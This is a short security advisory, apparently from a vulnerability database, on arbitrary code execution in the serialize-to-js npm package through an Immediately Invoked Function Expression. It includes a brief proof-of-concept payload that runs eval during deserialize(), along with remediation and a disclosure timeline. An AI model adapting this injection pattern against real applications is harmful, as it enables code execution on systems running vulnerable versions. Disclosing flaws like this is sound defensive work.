Severity: critical

Code Execution Through IIFE

serialize-to-js

Overview

Affected versions of serialize-to-js may be vulnerable to arbitrary code execution through an Immediately Invoked Function Expression (IIFE).

Proof of Concept

// A serialized string carrying an IIFE; the function body runs when the string is evaluated
var payload = "{e: (function(){ eval('console.log(`exploited`)') })() }"
var serialize = require('serialize-to-js');
// deserialize() evaluates the input as JavaScript rather than treating it as data
serialize.deserialize(payload);

Remediation

Update to version 1.0.0 or later, and review this disclaimer from the author.

Advisory timeline

  1. published: Advisory published, Feb 10th, 2017
  2. reported: Feb 10th, 2017